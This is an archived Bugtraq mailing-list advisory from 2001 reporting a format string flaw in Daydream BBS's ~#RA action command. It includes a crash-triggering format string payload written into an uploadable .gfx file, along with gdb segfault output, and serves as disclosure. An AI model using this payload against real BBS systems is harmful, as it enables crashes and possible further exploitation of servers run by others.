[23658] in bugtraq
Daydream BBS Format strings issue.
daemon@ATHENA.MIT.EDU (KF)
Mon Dec 31 00:30:21 2001
Message-ID: <3C2FADE7.3020802@snosoft.com>
Date: Sun, 30 Dec 2001 19:14:31 -0500
From: KF <dotslash@snosoft.com>
MIME-Version: 1.0
To: bugtraq@security-focus.com
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Daydream BBS recently underwent some security changes.Although the
buffer overflow
was fixed in the ~#RA command I am not sure if a format strings issue
was addressed Its my
understanding that the users of daydream have the option of adding
"Action commands"
("~#RA being one of them")into the text files that they post. If a user
forms a specialy crafted
text file uploads to daydream and then views the message using the menu
system the issue
could be exploited.
background info:
~#RA[FILE]|[max]|
Show random textfile. Format for file is "/path/foobar%d.ext",
where %d is a random
number (1-[max]).
example:
echo "~#RA%s%s%s%s%s%s" > filetoupload.gfx. Then place this file on the server and view it via the menu system.
Simple test to proove existance:
[root@linuxppc <mailto:root@linuxppc> bbs]# echo "~#RA%s%s%s%s%s%s" > display/iso/welcome.gfx
·| All accounts deleted - login |·
:| as NEW! |:
.:| |:.
. ....:::| NEW / CHAT / LOGOFF |:::.... .
`------------------------------'
Username: test
Password: ****
Program received signal SIGSEGV, Segmentation fault.
formatted_print (buffer=0x7fffda48 '-' <repeats 70 times>, ")\n",
flags=268615586) at typetext.c:594
594 *cm++ = *sr++;
(gdb) bt
#0 formatted_print (buffer=0x7fffda48 '-' <repeats 70 times>, ")\n",
flags=268615586) at typetext.c:594
(gdb) x/10s $r1
0x7fffd440: "\177ÿÚ\220\020\001Öì%s%s%s%s%s%s\n"
-KF
